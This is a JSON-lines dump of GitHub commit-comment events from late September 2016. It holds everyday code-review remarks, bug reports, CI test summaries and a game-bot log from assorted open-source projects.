{"id":"4641715014","type":"CommitCommentEvent","actor":{"login":"Keital"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19236902,"position":null,"line":null,"path":null,"commit_id":"c6f662630b7c61564bf1c1fbcdc905f1134f2faf","created_at":"2016-09-30T06:38:27Z","updated_at":"2016-09-30T06:38:27Z","body":"@Bodeguero Nice!!!"}},"created_at":"2016-09-30T06:38:27Z"}
{"id":"4641715459","type":"CommitCommentEvent","actor":{"login":"MSF-Jarvis"},"repo":{"name":"halogenOS/android_frameworks_base"},"payload":{"comment":{"id":19236905,"position":null,"line":null,"path":null,"commit_id":"544d63195a031cb0c69c4b56763fc72491fdbba4","created_at":"2016-09-30T06:38:38Z","updated_at":"2016-09-30T06:38:38Z","body":"This fixes the `ClassNotFound` error we were seeing in the logcats?"}},"created_at":"2016-09-30T06:38:38Z"}
{"id":"4641715548","type":"CommitCommentEvent","actor":{"login":"olemis"},"repo":{"name":"scipy-latinamerica/scipyla2017"},"payload":{"comment":{"id":19236907,"position":5,"line":114,"path":"docs/tracks.md","commit_id":"8f17150d2422cab0219a113cc60c1e3a2858995d","created_at":"2016-09-30T06:38:41Z","updated_at":"2016-09-30T06:38:41Z","body":"On 9/29/16, Raniere Silva <notifications@github.com> wrote:\n> Why not only say Engineers?\n>\n\nTo emphasize Process Automation .\n"}},"created_at":"2016-09-30T06:38:41Z"}
{"id":"4641719314","type":"CommitCommentEvent","actor":{"login":"wolfpackmars2"},"repo":{"name":"saltstack/salt"},"payload":{"comment":{"id":19236912,"position":null,"line":null,"path":null,"commit_id":"79a719b7193d94bf0ce871e16449d0398a0669c7","created_at":"2016-09-30T06:39:52Z","updated_at":"2016-09-30T06:39:52Z","body":"Fixes #18671"}},"created_at":"2016-09-30T06:39:52Z"}
{"id":"4641722549","type":"CommitCommentEvent","actor":{"login":"olemis"},"repo":{"name":"scipy-latinamerica/scipyla2017"},"payload":{"comment":{"id":19236916,"position":14,"line":330,"path":"docs/tracks.md","commit_id":"8f17150d2422cab0219a113cc60c1e3a2858995d","created_at":"2016-09-30T06:40:56Z","updated_at":"2016-09-30T06:40:56Z","body":"On 9/29/16, Raniere Silva <notifications@github.com> wrote:\n> Modern Societies doesn't mean anything to me.\n>\n\nOk . Could you please provide us with a word enclosing Social\nSciences, Humanities, Architecture and related sciences ?\n"}},"created_at":"2016-09-30T06:40:56Z"}
{"id":"4641722920","type":"CommitCommentEvent","actor":{"login":"cooler-SAI"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19236919,"position":null,"line":null,"path":null,"commit_id":"64bd08ab62c9d9bfac00001a27bb425719edf0d3","created_at":"2016-09-30T06:41:05Z","updated_at":"2016-09-30T06:41:05Z","body":"damn, can't wait for mmaps))) good Job here"}},"created_at":"2016-09-30T06:41:05Z"}
{"id":"4641725951","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"MenkinaNataliya/CourseOfTheContour"},"payload":{"comment":{"id":19236924,"position":23,"line":24,"path":"Triangle1/Program.cs","commit_id":"02d53f1922564aad2980486f4b924c9d2089b189","created_at":"2016-09-30T06:42:04Z","updated_at":"2016-09-30T06:42:04Z","body":"Эти две строки\r\nprivate double a { get; set; }\r\npublic double getA() { return this.a; }\r\nможно (нужно :) заменить на \r\npublic double SideA { get; private set; }\r\nТогда поле А будет доступно на чтение как public и на запись, как private\r\nПодробнее прочитайте тут https://msdn.microsoft.com/ru-ru/library/w86s7x04.aspx\r\n\r\nА так же обратите внимание, что публичные методы, поля и свойства начинаются с большой буквы (как я написал в примере выше)"}},"created_at":"2016-09-30T06:42:04Z"}
{"id":"4641727979","type":"CommitCommentEvent","actor":{"login":"benda1996"},"repo":{"name":"benda1996/Tutorial"},"payload":{"comment":{"id":19236930,"position":8,"line":8,"path":".gitattributes","commit_id":"01ad9157cf120fc61d472c0fd66a58ce36b4df94","created_at":"2016-09-30T06:42:41Z","updated_at":"2016-09-30T06:42:41Z","body":"intereswting"}},"created_at":"2016-09-30T06:42:41Z"}
{"id":"4641731900","type":"CommitCommentEvent","actor":{"login":"rix1337"},"repo":{"name":"rix1337/RSScrawler"},"payload":{"comment":{"id":19236944,"position":null,"line":null,"path":null,"commit_id":"74566276666cdd1f9ae7a2387214b58d681e6992","created_at":"2016-09-30T06:43:56Z","updated_at":"2016-09-30T06:43:56Z","body":"#88 sollte behoben sein."}},"created_at":"2016-09-30T06:43:56Z"}
{"id":"4641734408","type":"CommitCommentEvent","actor":{"login":"sebastiangoetz"},"repo":{"name":"phdd/diplom"},"payload":{"comment":{"id":19236949,"position":33,"line":79,"path":"document.md","commit_id":"d6d4a9d63952b1a25060770d36bca413761dc2f5","created_at":"2016-09-30T06:44:41Z","updated_at":"2016-09-30T06:44:41Z","body":"Ich bin mir nicht sicher auf welchen Teil des commits du dich beziehst, \naber generell sollten Stichpunkte eher selten genutzt werden.\n\nMfG\nSebastian\n\n\nAm 29.09.2016 um 18:42 schrieb Peter:\n>\n> @sebastiangoetz <https://github.com/sebastiangoetz> Sind Stichpunkte \n> geeignet oder wäre hier Fließtext besser?\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub \n> <https://github.com/phdd/diplom/commit/d6d4a9d63952b1a25060770d36bca413761dc2f5#commitcomment-19227108>, \n> or mute the thread \n> <https://github.com/notifications/unsubscribe-auth/AGjW6lKo4Bhra4Hppol50zjhrLXHB3GFks5qu-p7gaJpZM4KKN8U>.\n>\n\n-- \nDr.-Ing. Sebastian Götz\nResearcher (tenured)\n\nTechnische Universität Dresden\nFakultät für Informatik\nInstitut für Software- und Multimediatechnik\nLehrstuhl für Softwaretechnologie\nwww: http://www.st.inf.tu-dresden.de/\nMail: sebastian.goetz@acm.org\nKontakt: INF 2084\nTel.: +49 351 463 38346\n\njExam Group\nwww: http://www.jexam.de\n\n"}},"created_at":"2016-09-30T06:44:41Z"}
{"id":"4641737403","type":"CommitCommentEvent","actor":{"login":"Keital"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19236953,"position":null,"line":null,"path":null,"commit_id":"64bd08ab62c9d9bfac00001a27bb425719edf0d3","created_at":"2016-09-30T06:45:35Z","updated_at":"2016-09-30T06:45:35Z","body":"Think it's not too far, have to learn a little bit more"}},"created_at":"2016-09-30T06:45:35Z"}
{"id":"4641743142","type":"CommitCommentEvent","actor":{"login":"ffcrg"},"repo":{"name":"messismore/ecpiww"},"payload":{"comment":{"id":19236966,"position":null,"line":null,"path":null,"commit_id":"179e6f816abf2492c386a4ced39c129336f7789e","created_at":"2016-09-30T06:47:25Z","updated_at":"2016-09-30T06:47:25Z","body":"Based on the console output: Meter  2C2D 67309853 30 0C 0 (exp) 0 \r\n//printf(\"Meter  %04X %08X %02X %02X %d (exp) %d \\n\", RFSource.manufacturerID, RFSource.ident, RFSource.version, RFSource.type, RFData.value, RFData.exp);\r\n\r\n\r\n// 0x2C2D is  the manufactur id of Kamstrup\r\n#define FASTFORWARD             0x18C4\r\n#define KAMSTRUP             0x2C2D   //http://www.m-bus.de/man.html\r\n\r\n//0x67309853 is the device ID of your device\r\n\r\n//0x30 is the version\r\n\r\n//0x0C is the meter type Heat (Volume measured at flow temperature: inlet) \r\n//http://www.m-bus.com/files/w4b21021.pdf \r\n\r\n#define METER_HEAT_FLOWT                0x0C\r\n\r\nif(ecpiwwMeter[iX].type <= METER_WATER ){\r\n                ecpiwwMeter[iX].manufacturerID = FASTFORWARD;\r\n                ecpiwwMeter[iX].version        = 0x01;\r\n}else{\r\n                ecpiwwMeter[iX].manufacturerID = KAMSTRUP;\r\n                ecpiwwMeter[iX].version        = 0x30;\r\n}\r\n\r\n"}},"created_at":"2016-09-30T06:47:25Z"}
{"id":"4641749659","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19236980,"position":null,"line":null,"path":null,"commit_id":"3c3dc0caff8512d3d93211ecb83857c7d2603b58","created_at":"2016-09-30T06:49:29Z","updated_at":"2016-09-30T06:49:29Z","body":"input_processor_refactor (mbadams5) - x86_64-MacOS-10.9-clang: Tests Failed (1820 of 2361 tests passed, 21 test warnings)\n\n * 505 tests had: AUD diffs.\n * 488 tests had: EIO diffs.\n * 468 tests had: Table big diffs.\n * 210 tests had: RDD diffs.\n * 134 tests had: ERR diffs.\n * 365 tests had: MTD diffs.\n * 269 tests had: DXF diffs.\n * 1 test had: S...\n * 386 tests had: SHD diffs.\n * 404 tests had: BND diffs.\n * 293 tests had: MDD diffs.\n * 185 tests had: SSZ big diffs.\n * 14 tests had: ESO big diffs.\n * 9 tests had: MTR big diffs.\n * 9 tests had: ZSZ small diffs.\n * 28 tests had: ESO small diffs.\n * 22 tests had: MTR small diffs.\n * 3 tests had: delightin diffs.\n * 3 tests had: delightout diffs.\n * 1 test had: M...\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3c3dc0caff8512d3d93211ecb83857c7d2603b58-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3c3dc0caff8512d3d93211ecb83857c7d2603b58-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-77.09%25-red.svg)</a> \n"}},"created_at":"2016-09-30T06:49:29Z"}
{"id":"4641758990","type":"CommitCommentEvent","actor":{"login":"sverma88"},"repo":{"name":"sverma88/AAAI_Submission_3487"},"payload":{"comment":{"id":19236991,"position":null,"line":null,"path":null,"commit_id":"11ec3f2d1154e5f3443768efc414123c35d88090","created_at":"2016-09-30T06:52:19Z","updated_at":"2016-09-30T06:52:19Z","body":"Please download Tensor toolbox from http://www.sandia.gov/~tgkolda/TensorToolbox/index-2.6.html"}},"created_at":"2016-09-30T06:52:19Z"}
{"id":"4641761974","type":"CommitCommentEvent","actor":{"login":"DenisKolodin"},"repo":{"name":"rust-lang/rustup.sh"},"payload":{"comment":{"id":19236993,"position":null,"line":null,"path":null,"commit_id":"5059e4e7f74e955d65b63d7f0652a88af8c9cfae","created_at":"2016-09-30T06:53:13Z","updated_at":"2016-09-30T06:53:13Z","body":"Local Win+MinGW has broken too"}},"created_at":"2016-09-30T06:53:13Z"}
{"id":"4641769405","type":"CommitCommentEvent","actor":{"login":"lostiniceland"},"repo":{"name":"ops4j/org.ops4j.pax.cdi"},"payload":{"comment":{"id":19237004,"position":null,"line":null,"path":null,"commit_id":"0de74ad120e3d0f8ba02b174d7d24420291cb3ae","created_at":"2016-09-30T06:55:23Z","updated_at":"2016-09-30T06:55:23Z","body":"With regards to this [statement](https://groups.google.com/d/msg/ops4j/q8A4qniAtCg/2VBYAbslBwAJ), I am currently using 1.0.0-SNAPSHOT for a PoC together with Pax-Web 6.0.0-SNAPSHOT.\r\n\r\nThis change breaks my runtime."}},"created_at":"2016-09-30T06:55:23Z"}
{"id":"4641774135","type":"CommitCommentEvent","actor":{"login":"lammn"},"repo":{"name":"eccubevn/ec-cube"},"payload":{"comment":{"id":19237013,"position":30,"line":95,"path":"tests/Eccube/Tests/Web/CartValidationTest.php","commit_id":"5a788a54b7934704c7d58a983c390c29d8727d40","created_at":"2016-09-30T06:56:46Z","updated_at":"2016-09-30T06:56:46Z","body":"Should use other method for submit form. "}},"created_at":"2016-09-30T06:56:46Z"}
{"id":"4641777324","type":"CommitCommentEvent","actor":{"login":"DarkSon09"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":19237017,"position":null,"line":null,"path":null,"commit_id":"40d8547c346cd23ecdce9d537dd456545805c399","created_at":"2016-09-30T06:57:48Z","updated_at":"2016-09-30T06:57:48Z","body":"I tried again. and continuous repetition, I must stop and start.\r\nsorry for bad eng.\r\n[01:35:09 PM]  Loaded Build: v0.1-28/09/2016\r\n[01:37:14 PM]  Initializing AI...\r\n[01:37:16 PM]  Changing objective to: Adventure\r\n[01:37:17 PM]  Scene: Hero Remove\r\n[01:37:19 PM]  Scene: Heroes\r\n[01:37:19 PM]  Changing objective to: Hero Management\r\n[01:37:19 PM]  Start managing heroes\r\n[01:37:21 PM]  Checking each position for level 30...\r\n[01:37:28 PM]  Nothing to manage\r\n[01:37:28 PM]  Done managing heroes\r\n[01:37:28 PM]  Changing objective to: Adventure\r\n[01:37:30 PM]  Scene: Adventure Start\r\n[01:37:32 PM]  Scene: Map Select\r\n[01:37:36 PM]  Scene: Adventure Ready\r\n[01:37:39 PM]  Scene: Adventure Start\r\n[01:37:42 PM]  Scene: Heroes\r\n[01:37:46 PM]  Scene: Map Select\r\n[01:37:49 PM]  Scene: Adventure Ready\r\n[01:37:52 PM]  Scene: Adventure Start\r\n[01:37:55 PM]  Scene: Hero Join\r\n[01:37:57 PM]  Scene: Heroes\r\n[01:38:00 PM]  Scene: Map Select\r\n[01:38:04 PM]  Scene: Adventure Ready\r\n[01:38:07 PM]  Scene: Adventure Start\r\n[01:38:09 PM]  Scene: Hero Join\r\n[01:38:11 PM]  Scene: Heroes\r\n[01:38:15 PM]  Scene: Map Select\r\n[01:38:18 PM]  Scene: Adventure Ready\r\n[01:38:20 PM]  Initializing AI...\r\n[01:38:22 PM]  Changing objective to: Adventure\r\n[01:38:23 PM]  Scene: Adventure Start\r\n[01:38:30 PM]  Scene: Adventure Fight\r\n[01:38:33 PM]  @ Wave 1\r\n[01:38:55 PM]  @ Wave 2\r\n[01:39:23 PM]  @ Wave 3\r\n[01:39:41 PM]  Scene: Victory\r\n[01:39:46 PM]  Scene: Adventure Loot\r\n[01:40:03 PM]  Scene: Adventure Start\r\n[01:40:10 PM]  Scene: Adventure Fight\r\n[01:40:11 PM]  @ Wave 1\r\n[01:40:30 PM]  @ Wave 2\r\n[01:40:57 PM]  @ Wave 3\r\n[01:41:12 PM]  Scene: Victory\r\n[01:41:18 PM]  Scene: Adventure Loot\r\n[01:41:30 PM]  Scene: Adventure Start\r\n[01:41:37 PM]  Scene: Adventure Fight\r\n[01:41:38 PM]  @ Wave 1\r\n[01:41:59 PM]  @ Wave 2\r\n[01:42:27 PM]  @ Wave 3\r\n[01:42:44 PM]  Scene: Victory\r\n[01:42:50 PM]  Scene: Adventure Loot\r\n[01:43:02 PM]  Scene: Adventure Start\r\n[01:43:10 PM]  Scene: Adventure Fight\r\n[01:43:11 PM]  @ Wave 1\r\n[01:43:30 PM]  @ Wave 2\r\n[01:44:01 PM]  @ Wave 3\r\n[01:44:18 PM]  Scene: Victory\r\n[01:44:24 PM]  Scene: Adventure Loot\r\n[01:44:41 PM]  Scene: Adventure Start\r\n[01:44:48 PM]  Scene: Adventure Fight\r\n[01:44:51 PM]  @ Wave 1\r\n[01:45:12 PM]  @ Wave 2\r\n[01:45:46 PM]  @ Wave 3\r\n[01:46:05 PM]  Scene: Victory\r\n[01:46:10 PM]  Scene: Adventure Loot\r\n[01:46:22 PM]  Scene: Adventure Start\r\n[01:46:29 PM]  Scene: Adventure Fight\r\n[01:46:32 PM]  @ Wave 1\r\n[01:46:51 PM]  @ Wave 2\r\n[01:47:17 PM]  @ Wave 3\r\n[01:47:37 PM]  Scene: Victory\r\n[01:47:40 PM]  Scene: Adventure Loot\r\n[01:47:57 PM]  Scene: Level 30 Dialog\r\n[01:47:57 PM]  Hero Level 30\r\n[01:47:57 PM]  Max Heroes  level up per day : 4/100\r\n[01:47:57 PM]  Changing objective to: Hero Management\r\n[01:47:59 PM]  Scene: Adventure Start\r\n[01:48:02 PM]  Scene: Hero Join\r\n[01:48:04 PM]  Scene: Heroes\r\n[01:48:04 PM]  Start managing heroes\r\n[01:48:05 PM]  Checking each position for level 30...\r\n[01:48:07 PM]  - Got position: 3\r\n[01:48:15 PM]  Finding heroes...\r\n[01:48:18 PM]  Replaced hero position: 3\r\n[01:48:18 PM]  Done managing heroes\r\n[01:48:18 PM]  Changing objective to: Adventure\r\n[01:48:21 PM]  Scene: Map Select\r\n[01:48:25 PM]  Scene: Adventure Ready\r\n[01:48:28 PM]  Scene: Adventure Start\r\n[01:48:31 PM]  Scene: Heroes\r\n[01:48:34 PM]  Scene: Map Select\r\n[01:48:38 PM]  Scene: Adventure Ready\r\n[01:48:41 PM]  Scene: Adventure Start\r\n[01:48:43 PM]  Scene: Hero Join\r\n[01:48:45 PM]  Scene: Heroes\r\n[01:48:49 PM]  Scene: Map Select\r\n[01:48:52 PM]  Scene: Adventure Ready\r\n[01:48:55 PM]  Scene: Adventure Start\r\n[01:48:58 PM]  Scene: Hero Join\r\n[01:48:59 PM]  Scene: Heroes\r\n[01:49:03 PM]  Scene: Map Select\r\n[01:49:06 PM]  Initializing AI...\r\n[01:49:08 PM]  Changing objective to: Adventure\r\n[01:49:09 PM]  Scene: Adventure Ready\r\n[01:49:13 PM]  Scene: Adventure Start\r\n[01:49:15 PM]  Scene: Hero Join\r\n[01:49:17 PM]  Scene: Heroes\r\n[01:49:17 PM]  Changing objective to: Hero Management\r\n[01:49:17 PM]  Start managing heroes\r\n[01:49:18 PM]  Checking each position for level 30...\r\n[01:49:25 PM]  Nothing to manage\r\n[01:49:25 PM]  Done managing heroes\r\n[01:49:25 PM]  Changing objective to: Adventure\r\n[01:49:27 PM]  Scene: Adventure Start\r\n[01:49:32 PM]  Scene: Adventure Fight\r\n[01:49:35 PM]  @ Wave 1\r\n[01:49:54 PM]  @ Wave 2\r\n[01:50:27 PM]  @ Wave 3\r\n[01:50:45 PM]  Scene: Victory\r\n[01:50:51 PM]  Scene: Adventure Loot\r\n[01:51:07 PM]  Scene: Level 30 Dialog\r\n[01:51:07 PM]  Hero Level 30\r\n[01:51:07 PM]  Changing objective to: Hero Management\r\n[01:51:09 PM]  Scene: Adventure Start\r\n[01:51:13 PM]  Scene: Hero Join\r\n[01:51:14 PM]  Scene: Heroes\r\n[01:51:14 PM]  Start managing heroes\r\n[01:51:15 PM]  Checking each position for level 30...\r\n[01:51:19 PM]  - Got position: 4\r\n[01:51:21 PM]  - Got position: 5\r\n[01:51:25 PM]  Finding heroes...\r\n[01:51:34 PM]  Replaced hero position: 4\r\n[01:51:37 PM]  Scene: Hero Join\r\n[01:51:39 PM]  Scene: Heroes\r\n[01:51:40 PM]  Checking each position for level 30...\r\n[01:51:46 PM]  - Got position: 5\r\n[01:51:49 PM]  Finding heroes...\r\n[01:52:03 PM]  Replaced hero position: 5\r\n[01:52:03 PM]  Done managing heroes\r\n[01:52:03 PM]  Changing objective to: Adventure\r\n[01:52:08 PM]  Scene: Adventure Start\r\n[01:52:11 PM]  Scene: Battle Modes\r\n[01:52:13 PM]  Scene: Lobby\r\n[01:52:15 PM]  Scene: Adventure Modes\r\n[01:52:18 PM]  Scene: Map Select\r\n[01:52:22 PM]  Scene: Adventure Ready\r\n[01:52:25 PM]  Scene: Adventure Start\r\n[01:52:28 PM]  Scene: Heroes\r\n[01:52:31 PM]  Scene: Map Select\r\n[01:52:34 PM]  Scene: Adventure Ready\r\n[01:52:38 PM]  Scene: Adventure Start\r\n[01:52:40 PM]  Scene: Hero Join\r\n[01:52:42 PM]  Scene: Heroes\r\n[01:52:45 PM]  Scene: Map Select\r\n[01:52:49 PM]  Scene: Adventure Ready\r\n[01:52:52 PM]  Scene: Adventure Start\r\n[01:52:54 PM]  Scene: Hero Join\r\n[01:52:56 PM]  Scene: Heroes\r\n[01:52:59 PM]  Scene: Map Select\r\n[01:53:03 PM]  Scene: Adventure Ready\r\n[01:53:06 PM]  Scene: Adventure Start\r\n[01:53:08 PM]  Scene: Hero Join\r\n[01:53:10 PM]  Scene: Heroes\r\n[01:53:13 PM]  Scene: Map Select\r\n[01:53:17 PM]  Scene: Adventure Ready\r\n[01:53:20 PM]  Scene: Adventure Start\r\n[01:53:22 PM]  Scene: Hero Join\r\n[01:53:24 PM]  Scene: Heroes\r\n[01:53:27 PM]  Scene: Map Select\r\n[01:53:31 PM]  Scene: Adventure Ready\r\n[01:53:34 PM]  Scene: Adventure Start\r\n[01:53:36 PM]  Scene: Hero Join\r\n[01:53:38 PM]  Scene: Heroes\r\n[01:53:41 PM]  Scene: Map Select\r\n[01:53:45 PM]  Scene: Adventure Ready\r\n[01:53:48 PM]  Scene: Adventure Start\r\n[01:53:51 PM]  Scene: Hero Join\r\n[01:53:51 PM]  Initializing AI...\r\n[01:53:53 PM]  Changing objective to: Adventure\r\n[01:53:55 PM]  Scene: Heroes\r\n[01:53:55 PM]  Changing objective to: Hero Management\r\n[01:53:55 PM]  Start managing heroes\r\n[01:53:56 PM]  Checking each position for level 30...\r\n[01:54:03 PM]  Nothing to manage\r\n[01:54:03 PM]  Done managing heroes\r\n[01:54:03 PM]  Changing objective to: Adventure\r\n[01:54:05 PM]  Scene: Adventure Start\r\n[01:54:10 PM]  Scene: Adventure Fight\r\n[01:54:13 PM]  @ Wave 1\r\n"}},"created_at":"2016-09-30T06:57:48Z"}
{"id":"4641778346","type":"CommitCommentEvent","actor":{"login":"cschneider"},"repo":{"name":"apache/karaf"},"payload":{"comment":{"id":19237023,"position":null,"line":null,"path":null,"commit_id":"63474103dac5eaaab896ce4f46bde47544f1fcb9","created_at":"2016-09-30T06:58:08Z","updated_at":"2016-09-30T06:58:08Z","body":"Many thanks. About the features qualifier. I refered to the feature like this: \r\nhttps://github.com/cschneider/decanter-docker/blob/master/decanter-server/pom.xml#L42-L48\r\nIt seems that the karaf maven plugin uses the feature classifier to detect which of the dependencies are feature repos. If I add a reference to a feature that only uses type xml it does not seem to be added."}},"created_at":"2016-09-30T06:58:08Z"}
{"id":"4641779782","type":"CommitCommentEvent","actor":{"login":"apriliantocecep"},"repo":{"name":"apriliantocecep/hello-world"},"payload":{"comment":{"id":19237026,"position":4,"line":3,"path":"world hello","commit_id":"b1e9842d9393a4f08af9cc2124a5728809b329b0","created_at":"2016-09-30T06:58:33Z","updated_at":"2016-09-30T06:58:33Z","body":"haha suganteh merubah o menjadi 3 teh angka 3 ternyata o nya ada 3. #555"}},"created_at":"2016-09-30T06:58:33Z"}
{"id":"4641780975","type":"CommitCommentEvent","actor":{"login":"AlenOne"},"repo":{"name":"AlenOne/yangqingqing"},"payload":{"comment":{"id":19237028,"position":null,"line":null,"path":null,"commit_id":"0f13b6398a40befbe04fb7018f4ecdcd5a83a566","created_at":"2016-09-30T06:58:54Z","updated_at":"2016-09-30T06:58:54Z","body":"sdxsadsa"}},"created_at":"2016-09-30T06:58:54Z"}
{"id":"4641781299","type":"CommitCommentEvent","actor":{"login":"AlenOne"},"repo":{"name":"AlenOne/yangqingqing"},"payload":{"comment":{"id":19237030,"position":null,"line":null,"path":null,"commit_id":"0f13b6398a40befbe04fb7018f4ecdcd5a83a566","created_at":"2016-09-30T06:59:01Z","updated_at":"2016-09-30T06:59:01Z","body":"sdsad"}},"created_at":"2016-09-30T06:59:01Z"}
{"id":"4641781868","type":"CommitCommentEvent","actor":{"login":"AlenOne"},"repo":{"name":"AlenOne/yangqingqing"},"payload":{"comment":{"id":19237031,"position":null,"line":null,"path":null,"commit_id":"0f13b6398a40befbe04fb7018f4ecdcd5a83a566","created_at":"2016-09-30T06:59:13Z","updated_at":"2016-09-30T06:59:13Z","body":"组长干啥呢"}},"created_at":"2016-09-30T06:59:13Z"}
{"id":"4641781976","type":"CommitCommentEvent","actor":{"login":"MartinCura"},"repo":{"name":"martinvol/tallerII"},"payload":{"comment":{"id":19237032,"position":null,"line":null,"path":null,"commit_id":"bfb5fabe080fc983d1f548c08e03868075429296","created_at":"2016-09-30T06:59:15Z","updated_at":"2016-09-30T06:59:15Z","body":"Solo faltan \"detalles\" y el testeo para completar el #21 client-side."}},"created_at":"2016-09-30T06:59:15Z"}
{"id":"4641786025","type":"CommitCommentEvent","actor":{"login":"gnodet"},"repo":{"name":"ops4j/org.ops4j.pax.cdi"},"payload":{"comment":{"id":19237053,"position":null,"line":null,"path":null,"commit_id":"0de74ad120e3d0f8ba02b174d7d24420291cb3ae","created_at":"2016-09-30T07:00:23Z","updated_at":"2016-09-30T07:00:23Z","body":"Yes, sorry about that.\r\nThe problem is easy : pax-web 6.0.0 won't be released soon. So we have a choice: either never release 1.0.RC2, or switch back to 4.4.0-SNAPSHOT which will be released shortly so as to be able to release pax-cdi.\r\nI'll send an email in the thread to explain."}},"created_at":"2016-09-30T07:00:23Z"}
{"id":"4641791273","type":"CommitCommentEvent","actor":{"login":"janani4u"},"repo":{"name":"janani4u/ejabberd"},"payload":{"comment":{"id":19237060,"position":null,"line":null,"path":null,"commit_id":"e8607bb9324c44981fa502f9699497ee04917e42","created_at":"2016-09-30T07:01:54Z","updated_at":"2016-09-30T07:01:54Z","body":"For our use-case of  a large pub-sub node containing about 1 lakh subscribers, a publish item call was taking more than 2 minutes(measured using Tsung).\r\nIn our use-case, the pub-sub subscribers are added by the node-owner himself through manage subscriptions and users are not allowed to manage their own subscription.\r\nHence SubOptions were never used.\r\nUsing eprof and other profiling tools, we were able to narrow the problem area to the method lists_member/2  that gets called by subscribed_nodes_by_jid method.\r\nThrough further analysis on the ejabberd code, we were able to see a solution where for our use-case of pubsub-owner managed subscriptions, call to state_can_deliver method seemed unnecessary.\r\nThis would help avoid the subsequent loop processing and call to the fateful lists_member method, thereby giving a performance boost in the order of 40 times.\r\nFor the same use-case, the average time taken went down from 2 minutes to about 3 seconds."}},"created_at":"2016-09-30T07:01:54Z"}
{"id":"4641796592","type":"CommitCommentEvent","actor":{"login":"senia-psm"},"repo":{"name":"java8-course/streams"},"payload":{"comment":{"id":19237069,"position":97,"line":111,"path":"src/test/java/part2/exercise/CollectorsExercise1.java","commit_id":"433bee09a5a40451ccdccb95b3144d88410a1b9e","created_at":"2016-09-30T07:03:23Z","updated_at":"2016-09-30T07:03:23Z","body":"Don't omit `{}` in `if` statements."}},"created_at":"2016-09-30T07:03:23Z"}
{"id":"4641796638","type":"CommitCommentEvent","actor":{"login":"lqdung-lockon"},"repo":{"name":"cubevn/mail-magazine-plugin"},"payload":{"comment":{"id":19237070,"position":14,"line":206,"path":"Repository/MailMagazineCustomerRepository.php","commit_id":"4548c35841d446ae249f3b87a8b55a645f9ca531","created_at":"2016-09-30T07:03:24Z","updated_at":"2016-09-30T07:03:24Z","body":"-\tSymfony 2 standard (phpcs)"}},"created_at":"2016-09-30T07:03:24Z"}
{"id":"4641797506","type":"CommitCommentEvent","actor":{"login":"xiagw"},"repo":{"name":"easysoft/zentaopms"},"payload":{"comment":{"id":19237073,"position":null,"line":null,"path":null,"commit_id":"0851f9b2743ca427f001b2ba46a5db7b540e1722","created_at":"2016-09-30T07:03:38Z","updated_at":"2016-09-30T07:03:38Z","body":"燃鹅，并没有解决，open-ver-8.2.6，\r\n后台设置需要评审，提单个需求和批量，都是默认不需要评审。"}},"created_at":"2016-09-30T07:03:38Z"}
{"id":"4641797780","type":"CommitCommentEvent","actor":{"login":"Keital"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19237075,"position":null,"line":null,"path":null,"commit_id":"60891490cd494375ec9e1585a7c3775a8a7ab42a","created_at":"2016-09-30T07:03:43Z","updated_at":"2016-09-30T07:03:43Z","body":"Need help with Travis guys, dunno why it gives error, i compile in local and all is ok"}},"created_at":"2016-09-30T07:03:43Z"}
{"id":"4641800574","type":"CommitCommentEvent","actor":{"login":"manuelroth"},"repo":{"name":"driftyco/ionic"},"payload":{"comment":{"id":19237080,"position":null,"line":null,"path":null,"commit_id":"3671f3023bdf2a23d624076d5ddc343d6bc244a0","created_at":"2016-09-30T07:04:30Z","updated_at":"2016-09-30T07:04:30Z","body":"@jgw96 I still needed to add my service to the providers array in the Component in order to not get the \"No provider for Service found\"-Error. Could you clarify this?\r\n\r\nIf I don't have to add my service to the providers array in the Component anymore, how is it possible to control whether a new instance of the service should be created for a single page. Or if I just want a single instance of the service for the entire app."}},"created_at":"2016-09-30T07:04:30Z"}
{"id":"4641804940","type":"CommitCommentEvent","actor":{"login":"lostiniceland"},"repo":{"name":"ops4j/org.ops4j.pax.cdi"},"payload":{"comment":{"id":19237088,"position":null,"line":null,"path":null,"commit_id":"0de74ad120e3d0f8ba02b174d7d24420291cb3ae","created_at":"2016-09-30T07:05:44Z","updated_at":"2016-09-30T07:05:44Z","body":"I expected something like this.\r\n\r\nI will try to finish the missing Whiteboard-Feature for Pax-Web within the next month, so we can release something.\r\nShould we then start a Pax-CDI 2.0 branch which works with Pax-Web 6?"}},"created_at":"2016-09-30T07:05:44Z"}
{"id":"4641807739","type":"CommitCommentEvent","actor":{"login":"IAGAdmin"},"repo":{"name":"indautgrp/frappe"},"payload":{"comment":{"id":19237097,"position":null,"line":null,"path":null,"commit_id":"9858f0c5916afcd52cb09c589ad01808480ed277","created_at":"2016-09-30T07:06:36Z","updated_at":"2016-09-30T07:06:36Z","body":"There are ploblems\r\n\r\n![image](https://cloud.githubusercontent.com/assets/9671446/18983452/6e5dd5a2-871f-11e6-8fdc-d249dd0224fd.png)\r\n"}},"created_at":"2016-09-30T07:06:36Z"}
{"id":"4641810079","type":"CommitCommentEvent","actor":{"login":"lammn"},"repo":{"name":"eccubevn/ec-cube"},"payload":{"comment":{"id":19237109,"position":197,"line":262,"path":"tests/Eccube/Tests/Web/CartValidationTest.php","commit_id":"5a788a54b7934704c7d58a983c390c29d8727d40","created_at":"2016-09-30T07:07:17Z","updated_at":"2016-09-30T07:07:17Z","body":"Need verify message in cart screen. "}},"created_at":"2016-09-30T07:07:17Z"}
